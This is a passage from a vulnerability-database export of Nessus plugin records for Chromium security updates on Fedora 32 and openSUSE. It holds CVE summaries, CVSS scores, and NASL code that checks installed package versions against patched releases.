Chrome/Installed');\n\ngoogle_chrome_check_version(fix:'89.0.4389.72', severity:SECURITY_HOLE, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2021-04-13T07:58:03", "description": "The remote Fedora 32 host has a package installed that is affected by multiple vulnerabilities as referenced in the\nFEDORA-2021-c88a96bd4b advisory.\n\n - Stack buffer overflow in Data Transfer in Google Chrome on Linux prior to 88.0.4324.182 allowed a remote\n attacker to perform out of bounds memory access via a crafted HTML page. 
(CVE-2021-21149)\n\n - Use after free in Downloads in Google Chrome on Windows prior to 88.0.4324.182 allowed a remote attacker\n who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.\n (CVE-2021-21150)\n\n - Use after free in Payments in Google Chrome prior to 88.0.4324.182 allowed a remote attacker to\n potentially perform a sandbox escape via a crafted HTML page. (CVE-2021-21151)\n\n - Heap buffer overflow in Media in Google Chrome on Linux prior to 88.0.4324.182 allowed a remote attacker\n to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21152)\n\n - Stack buffer overflow in GPU Process in Google Chrome on Linux prior to 88.0.4324.182 allowed a remote\n attacker to potentially perform out of bounds memory access via a crafted HTML page. (CVE-2021-21153)\n\n - Heap buffer overflow in Tab Strip in Google Chrome prior to 88.0.4324.182 allowed a remote attacker who\n had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.\n (CVE-2021-21154)\n\n - Heap buffer overflow in Tab Strip in Google Chrome on Windows prior to 88.0.4324.182 allowed a remote\n attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted\n HTML page. (CVE-2021-21155)\n\n - Heap buffer overflow in V8 in Google Chrome prior to 88.0.4324.182 allowed a remote attacker to\n potentially exploit heap corruption via a crafted script. (CVE-2021-21156)\n\n - Use after free in Web Sockets in Google Chrome on Linux prior to 88.0.4324.182 allowed a remote attacker\n to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21157)\n\n - Heap buffer overflow in TabStrip in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. 
(CVE-2021-21159, CVE-2021-21161)\n\n - Heap buffer overflow in WebAudio in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21160)\n\n - Use after free in WebRTC in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (CVE-2021-21162)\n\n - Insufficient data validation in Reader Mode in Google Chrome on iOS prior to 89.0.4389.72 allowed a remote\n attacker to leak cross-origin data via a crafted HTML page and a malicious server. (CVE-2021-21163)\n\n - Insufficient data validation in Chrome on iOS in Google Chrome on iOS prior to 89.0.4389.72 allowed a\n remote attacker to leak cross-origin data via a crafted HTML page. (CVE-2021-21164)\n\n - Data race in audio in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit\n heap corruption via a crafted HTML page. (CVE-2021-21165, CVE-2021-21166)\n\n - Use after free in bookmarks in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21167)\n\n - Insufficient policy enforcement in appcache in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to obtain potentially sensitive information from process memory via a crafted HTML page.\n (CVE-2021-21168)\n\n - Out of bounds memory access in V8 in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to\n potentially perform out of bounds memory access via a crafted HTML page. 
(CVE-2021-21169)\n\n - Incorrect security UI in Loader in Google Chrome prior to 89.0.4389.72 allowed a remote attacker who had\n compromised the renderer process to spoof the contents of the Omnibox (URL bar) via a crafted HTML page.\n (CVE-2021-21170)\n\n - Incorrect security UI in TabStrip and Navigation in Google Chrome on Android prior to 89.0.4389.72 allowed\n a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. (CVE-2021-21171)\n\n - Insufficient policy enforcement in File System API in Google Chrome on Windows prior to 89.0.4389.72\n allowed a remote attacker to bypass filesystem restrictions via a crafted HTML page. (CVE-2021-21172)\n\n - Side-channel information leakage in Network Internals in Google Chrome prior to 89.0.4389.72 allowed a\n remote attacker to leak cross-origin data via a crafted HTML page. (CVE-2021-21173)\n\n - Inappropriate implementation in Referrer in Google Chrome prior to 89.0.4389.72 allowed a remote attacker\n to bypass navigation restrictions via a crafted HTML page. (CVE-2021-21174)\n\n - Inappropriate implementation in Site isolation in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to leak cross-origin data via a crafted HTML page. (CVE-2021-21175)\n\n - Inappropriate implementation in full screen mode in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. 
(CVE-2021-21176)\n\n - Insufficient policy enforcement in Autofill in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to obtain potentially sensitive information from process memory via a crafted HTML page.\n (CVE-2021-21177)\n\n - Inappropriate implementation in Compositing in Google Chrome on Linux and Windows prior to 89.0.4389.72\n allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page.\n (CVE-2021-21178)\n\n - Use after free in Network Internals in Google Chrome on Linux prior to 89.0.4389.72 allowed a remote\n attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21179)\n\n - Use after free in tab search in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21180)\n\n - Side-channel information leakage in autofill in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to obtain potentially sensitive information from process memory via a crafted HTML page.\n (CVE-2021-21181)\n\n - Insufficient policy enforcement in navigations in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker who had compromised the renderer process to bypass navigation restrictions via a crafted HTML\n page. (CVE-2021-21182)\n\n - Inappropriate implementation in performance APIs in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to leak cross-origin data via a crafted HTML page. (CVE-2021-21183, CVE-2021-21184)\n\n - Insufficient policy enforcement in extensions in Google Chrome prior to 89.0.4389.72 allowed an attacker\n who convinced a user to install a malicious extension to obtain sensitive information via a crafted Chrome\n Extension. 
(CVE-2021-21185)\n\n - Insufficient policy enforcement in QR scanning in Google Chrome on iOS prior to 89.0.4389.72 allowed an\n attacker who convinced the user to scan a QR code to bypass navigation restrictions via a crafted QR code.\n (CVE-2021-21186)\n\n - Insufficient data validation in URL formatting in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to perform domain spoofing via IDN homographs via a crafted domain name. (CVE-2021-21187)\n\n - Use after free in Blink in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (CVE-2021-21188)\n\n - Insufficient policy enforcement in payments in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to bypass navigation restrictions via a crafted HTML page. (CVE-2021-21189)\n\n - Uninitialized data in PDFium in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to obtain\n potentially sensitive information from process memory via a crafted PDF file. 
(CVE-2021-21190)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 3, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-03-22T00:00:00", "title": "Fedora 32 : chromium (2021-c88a96bd4b)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-21168", "CVE-2021-21173", "CVE-2021-21151", "CVE-2021-21185", "CVE-2021-21165", "CVE-2021-21179", "CVE-2021-21171", "CVE-2021-21161", "CVE-2021-21178", "CVE-2021-21176", "CVE-2021-21159", "CVE-2021-21187", "CVE-2021-21180", "CVE-2021-21170", "CVE-2021-21156", "CVE-2021-21162", "CVE-2021-21181", "CVE-2021-21155", "CVE-2021-21167", "CVE-2021-21150", "CVE-2021-21172", "CVE-2021-21152", "CVE-2021-21163", "CVE-2021-21186", "CVE-2021-21166", "CVE-2021-21154", "CVE-2021-21175", "CVE-2021-21190", "CVE-2021-21149", "CVE-2021-21160", "CVE-2021-21184", "CVE-2021-21164", "CVE-2021-21188", "CVE-2021-21174", "CVE-2021-21177", "CVE-2021-21189", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21169", "CVE-2021-21153", "CVE-2021-21157"], "modified": "2021-03-22T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:32", "p-cpe:/a:fedoraproject:fedora:chromium"], "id": "FEDORA_2021-C88A96BD4B.NASL", "href": "https://www.tenable.com/plugins/nessus/147941", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n# The descriptive text and package checks in this plugin were\n# extracted from Fedora Security Advisory FEDORA-2021-c88a96bd4b\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147941);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/04/12\");\n\n script_cve_id(\n \"CVE-2021-21149\",\n \"CVE-2021-21150\",\n \"CVE-2021-21151\",\n \"CVE-2021-21152\",\n \"CVE-2021-21153\",\n \"CVE-2021-21154\",\n \"CVE-2021-21155\",\n \"CVE-2021-21156\",\n \"CVE-2021-21157\",\n \"CVE-2021-21159\",\n \"CVE-2021-21160\",\n \"CVE-2021-21161\",\n 
\"CVE-2021-21162\",\n \"CVE-2021-21163\",\n \"CVE-2021-21164\",\n \"CVE-2021-21165\",\n \"CVE-2021-21166\",\n \"CVE-2021-21167\",\n \"CVE-2021-21168\",\n \"CVE-2021-21169\",\n \"CVE-2021-21170\",\n \"CVE-2021-21171\",\n \"CVE-2021-21172\",\n \"CVE-2021-21173\",\n \"CVE-2021-21174\",\n \"CVE-2021-21175\",\n \"CVE-2021-21176\",\n \"CVE-2021-21177\",\n \"CVE-2021-21178\",\n \"CVE-2021-21179\",\n \"CVE-2021-21180\",\n \"CVE-2021-21181\",\n \"CVE-2021-21182\",\n \"CVE-2021-21183\",\n \"CVE-2021-21184\",\n \"CVE-2021-21185\",\n \"CVE-2021-21186\",\n \"CVE-2021-21187\",\n \"CVE-2021-21188\",\n \"CVE-2021-21189\",\n \"CVE-2021-21190\"\n );\n script_xref(name:\"FEDORA\", value:\"2021-c88a96bd4b\");\n\n script_name(english:\"Fedora 32 : chromium (2021-c88a96bd4b)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Fedora 32 host has a package installed that is affected by multiple vulnerabilities as referenced in the\nFEDORA-2021-c88a96bd4b advisory.\n\n - Stack buffer overflow in Data Transfer in Google Chrome on Linux prior to 88.0.4324.182 allowed a remote\n attacker to perform out of bounds memory access via a crafted HTML page. (CVE-2021-21149)\n\n - Use after free in Downloads in Google Chrome on Windows prior to 88.0.4324.182 allowed a remote attacker\n who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.\n (CVE-2021-21150)\n\n - Use after free in Payments in Google Chrome prior to 88.0.4324.182 allowed a remote attacker to\n potentially perform a sandbox escape via a crafted HTML page. (CVE-2021-21151)\n\n - Heap buffer overflow in Media in Google Chrome on Linux prior to 88.0.4324.182 allowed a remote attacker\n to potentially exploit heap corruption via a crafted HTML page. 
(CVE-2021-21152)\n\n - Stack buffer overflow in GPU Process in Google Chrome on Linux prior to 88.0.4324.182 allowed a remote\n attacker to potentially perform out of bounds memory access via a crafted HTML page. (CVE-2021-21153)\n\n - Heap buffer overflow in Tab Strip in Google Chrome prior to 88.0.4324.182 allowed a remote attacker who\n had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.\n (CVE-2021-21154)\n\n - Heap buffer overflow in Tab Strip in Google Chrome on Windows prior to 88.0.4324.182 allowed a remote\n attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted\n HTML page. (CVE-2021-21155)\n\n - Heap buffer overflow in V8 in Google Chrome prior to 88.0.4324.182 allowed a remote attacker to\n potentially exploit heap corruption via a crafted script. (CVE-2021-21156)\n\n - Use after free in Web Sockets in Google Chrome on Linux prior to 88.0.4324.182 allowed a remote attacker\n to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21157)\n\n - Heap buffer overflow in TabStrip in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21159, CVE-2021-21161)\n\n - Heap buffer overflow in WebAudio in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21160)\n\n - Use after free in WebRTC in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (CVE-2021-21162)\n\n - Insufficient data validation in Reader Mode in Google Chrome on iOS prior to 89.0.4389.72 allowed a remote\n attacker to leak cross-origin data via a crafted HTML page and a malicious server. 
(CVE-2021-21163)\n\n - Insufficient data validation in Chrome on iOS in Google Chrome on iOS prior to 89.0.4389.72 allowed a\n remote attacker to leak cross-origin data via a crafted HTML page. (CVE-2021-21164)\n\n - Data race in audio in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit\n heap corruption via a crafted HTML page. (CVE-2021-21165, CVE-2021-21166)\n\n - Use after free in bookmarks in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21167)\n\n - Insufficient policy enforcement in appcache in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to obtain potentially sensitive information from process memory via a crafted HTML page.\n (CVE-2021-21168)\n\n - Out of bounds memory access in V8 in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to\n potentially perform out of bounds memory access via a crafted HTML page. (CVE-2021-21169)\n\n - Incorrect security UI in Loader in Google Chrome prior to 89.0.4389.72 allowed a remote attacker who had\n compromised the renderer process to spoof the contents of the Omnibox (URL bar) via a crafted HTML page.\n (CVE-2021-21170)\n\n - Incorrect security UI in TabStrip and Navigation in Google Chrome on Android prior to 89.0.4389.72 allowed\n a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. (CVE-2021-21171)\n\n - Insufficient policy enforcement in File System API in Google Chrome on Windows prior to 89.0.4389.72\n allowed a remote attacker to bypass filesystem restrictions via a crafted HTML page. (CVE-2021-21172)\n\n - Side-channel information leakage in Network Internals in Google Chrome prior to 89.0.4389.72 allowed a\n remote attacker to leak cross-origin data via a crafted HTML page. 
(CVE-2021-21173)\n\n - Inappropriate implementation in Referrer in Google Chrome prior to 89.0.4389.72 allowed a remote attacker\n to bypass navigation restrictions via a crafted HTML page. (CVE-2021-21174)\n\n - Inappropriate implementation in Site isolation in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to leak cross-origin data via a crafted HTML page. (CVE-2021-21175)\n\n - Inappropriate implementation in full screen mode in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. (CVE-2021-21176)\n\n - Insufficient policy enforcement in Autofill in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to obtain potentially sensitive information from process memory via a crafted HTML page.\n (CVE-2021-21177)\n\n - Inappropriate implementation in Compositing in Google Chrome on Linux and Windows prior to 89.0.4389.72\n allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page.\n (CVE-2021-21178)\n\n - Use after free in Network Internals in Google Chrome on Linux prior to 89.0.4389.72 allowed a remote\n attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21179)\n\n - Use after free in tab search in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21180)\n\n - Side-channel information leakage in autofill in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to obtain potentially sensitive information from process memory via a crafted HTML page.\n (CVE-2021-21181)\n\n - Insufficient policy enforcement in navigations in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker who had compromised the renderer process to bypass navigation restrictions via a crafted HTML\n page. 
(CVE-2021-21182)\n\n - Inappropriate implementation in performance APIs in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to leak cross-origin data via a crafted HTML page. (CVE-2021-21183, CVE-2021-21184)\n\n - Insufficient policy enforcement in extensions in Google Chrome prior to 89.0.4389.72 allowed an attacker\n who convinced a user to install a malicious extension to obtain sensitive information via a crafted Chrome\n Extension. (CVE-2021-21185)\n\n - Insufficient policy enforcement in QR scanning in Google Chrome on iOS prior to 89.0.4389.72 allowed an\n attacker who convinced the user to scan a QR code to bypass navigation restrictions via a crafted QR code.\n (CVE-2021-21186)\n\n - Insufficient data validation in URL formatting in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to perform domain spoofing via IDN homographs via a crafted domain name. (CVE-2021-21187)\n\n - Use after free in Blink in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (CVE-2021-21188)\n\n - Insufficient policy enforcement in payments in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to bypass navigation restrictions via a crafted HTML page. (CVE-2021-21189)\n\n - Uninitialized data in PDFium in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to obtain\n potentially sensitive information from process memory via a crafted PDF file. 
(CVE-2021-21190)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2021-c88a96bd4b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromium package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21190\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:32\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chromium\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Fedora' >!< release) audit(AUDIT_OS_NOT, 'Fedora');\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Fedora');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^32([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Fedora 32', 'Fedora ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Fedora', cpu);\n\npkgs = [\n {'reference':'chromium-89.0.4389.82-1.fc32', 'release':'FC32', 'rpm_spec_vers_cmp':TRUE, 'allowmaj':TRUE}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if 
(!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'chromium');\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-17T04:57:56", "description": "This update for chromium fixes the following issues :\n\nUpdate to 89.0.4389.72 (boo#1182358, boo#1182960) :\n\n - CVE-2021-21159: Heap buffer overflow in TabStrip.\n\n - CVE-2021-21160: Heap buffer overflow in WebAudio.\n\n - CVE-2021-21161: Heap buffer overflow in TabStrip.\n\n - CVE-2021-21162: Use after free in WebRTC.\n\n - CVE-2021-21163: Insufficient data validation in Reader\n Mode.\n\n - CVE-2021-21164: Insufficient data validation in Chrome\n for iOS.\n\n - CVE-2021-21165: Object lifecycle issue in audio.\n\n - CVE-2021-21166: Object lifecycle issue in audio.\n\n - CVE-2021-21167: Use after free in bookmarks.\n\n - CVE-2021-21168: Insufficient policy enforcement in\n appcache.\n\n - CVE-2021-21169: Out of bounds memory access in V8.\n\n - CVE-2021-21170: Incorrect security UI in Loader.\n\n - CVE-2021-21171: Incorrect security UI in TabStrip and\n Navigation.\n\n - CVE-2021-21172: Insufficient policy enforcement in File\n System API.\n\n - CVE-2021-21173: Side-channel information leakage in\n Network Internals.\n\n - CVE-2021-21174: Inappropriate implementation in\n Referrer.\n\n - CVE-2021-21175: Inappropriate implementation in Site\n isolation.\n\n - CVE-2021-21176: Inappropriate implementation in full\n screen mode.\n\n - CVE-2021-21177: Insufficient policy enforcement in\n 
Autofill.\n\n - CVE-2021-21178: Inappropriate implementation in\n Compositing.\n\n - CVE-2021-21179: Use after free in Network Internals.\n\n - CVE-2021-21180: Use after free in tab search.\n\n - CVE-2020-27844: Heap buffer overflow in OpenJPEG.\n\n - CVE-2021-21181: Side-channel information leakage in\n autofill.\n\n - CVE-2021-21182: Insufficient policy enforcement in\n navigations.\n\n - CVE-2021-21183: Inappropriate implementation in\n performance APIs.\n\n - CVE-2021-21184: Inappropriate implementation in\n performance APIs.\n\n - CVE-2021-21185: Insufficient policy enforcement in\n extensions.\n\n - CVE-2021-21186: Insufficient policy enforcement in QR\n scanning.\n\n - CVE-2021-21187: Insufficient data validation in URL\n formatting.\n\n - CVE-2021-21188: Use after free in Blink.\n\n - CVE-2021-21189: Insufficient policy enforcement in\n payments.\n\n - CVE-2021-21190: Uninitialized Use in PDFium.\n\n - CVE-2021-21149: Stack overflow in Data Transfer.\n\n - CVE-2021-21150: Use after free in Downloads.\n\n - CVE-2021-21151: Use after free in Payments.\n\n - CVE-2021-21152: Heap buffer overflow in Media.\n\n - CVE-2021-21153: Stack overflow in GPU Process. \n\n - CVE-2021-21154: Heap buffer overflow in Tab Strip.\n\n - CVE-2021-21155: Heap buffer overflow in Tab Strip.\n\n - CVE-2021-21156: Heap buffer overflow in V8.\n\n - CVE-2021-21157: Use after free in Web Sockets. 
\n\n - Fixed Sandbox with glibc 2.33 (boo#1182233)\n\n - Fixed an issue where chromium hangs on opening\n (boo#1182775).", "edition": 4, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-03-10T00:00:00", "title": "openSUSE Security Update : chromium (openSUSE-2021-392)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-21168", "CVE-2021-21173", "CVE-2021-21151", "CVE-2021-21185", "CVE-2021-21165", "CVE-2021-21179", "CVE-2021-21171", "CVE-2020-27844", "CVE-2021-21161", "CVE-2021-21178", "CVE-2021-21176", "CVE-2021-21159", "CVE-2021-21187", "CVE-2021-21180", "CVE-2021-21170", "CVE-2021-21156", "CVE-2021-21162", "CVE-2021-21181", "CVE-2021-21155", "CVE-2021-21167", "CVE-2021-21150", "CVE-2021-21172", "CVE-2021-21152", "CVE-2021-21163", "CVE-2021-21186", "CVE-2021-21166", "CVE-2021-21154", "CVE-2021-21175", "CVE-2021-21190", "CVE-2021-21149", "CVE-2021-21160", "CVE-2021-21184", "CVE-2021-21164", "CVE-2021-21188", "CVE-2021-21174", "CVE-2021-21177", "CVE-2021-21189", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21169", "CVE-2021-21153", "CVE-2021-21157"], "modified": "2021-03-10T00:00:00", "cpe": ["cpe:/o:novell:opensuse:15.2", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromium-debuginfo"], "id": "OPENSUSE-2021-392.NASL", "href": "https://www.tenable.com/plugins/nessus/147606", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2021-392.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(147606);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/16\");\n\n script_cve_id(\"CVE-2020-27844\", \"CVE-2021-21149\", \"CVE-2021-21150\", \"CVE-2021-21151\", 
\"CVE-2021-21152\", \"CVE-2021-21153\", \"CVE-2021-21154\", \"CVE-2021-21155\", \"CVE-2021-21156\", \"CVE-2021-21157\", \"CVE-2021-21159\", \"CVE-2021-21160\", \"CVE-2021-21161\", \"CVE-2021-21162\", \"CVE-2021-21163\", \"CVE-2021-21164\", \"CVE-2021-21165\", \"CVE-2021-21166\", \"CVE-2021-21167\", \"CVE-2021-21168\", \"CVE-2021-21169\", \"CVE-2021-21170\", \"CVE-2021-21171\", \"CVE-2021-21172\", \"CVE-2021-21173\", \"CVE-2021-21174\", \"CVE-2021-21175\", \"CVE-2021-21176\", \"CVE-2021-21177\", \"CVE-2021-21178\", \"CVE-2021-21179\", \"CVE-2021-21180\", \"CVE-2021-21181\", \"CVE-2021-21182\", \"CVE-2021-21183\", \"CVE-2021-21184\", \"CVE-2021-21185\", \"CVE-2021-21186\", \"CVE-2021-21187\", \"CVE-2021-21188\", \"CVE-2021-21189\", \"CVE-2021-21190\");\n\n script_name(english:\"openSUSE Security Update : chromium (openSUSE-2021-392)\");\n script_summary(english:\"Check for the openSUSE-2021-392 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for chromium fixes the following issues :\n\nUpdate to 89.0.4389.72 (boo#1182358, boo#1182960) :\n\n - CVE-2021-21159: Heap buffer overflow in TabStrip.\n\n - CVE-2021-21160: Heap buffer overflow in WebAudio.\n\n - CVE-2021-21161: Heap buffer overflow in TabStrip.\n\n - CVE-2021-21162: Use after free in WebRTC.\n\n - CVE-2021-21163: Insufficient data validation in Reader\n Mode.\n\n - CVE-2021-21164: Insufficient data validation in Chrome\n for iOS.\n\n - CVE-2021-21165: Object lifecycle issue in audio.\n\n - CVE-2021-21166: Object lifecycle issue in audio.\n\n - CVE-2021-21167: Use after free in bookmarks.\n\n - CVE-2021-21168: Insufficient policy enforcement in\n appcache.\n\n - CVE-2021-21169: Out of bounds memory access in V8.\n\n - CVE-2021-21170: Incorrect security UI in Loader.\n\n - CVE-2021-21171: Incorrect security UI in TabStrip and\n Navigation.\n\n - 
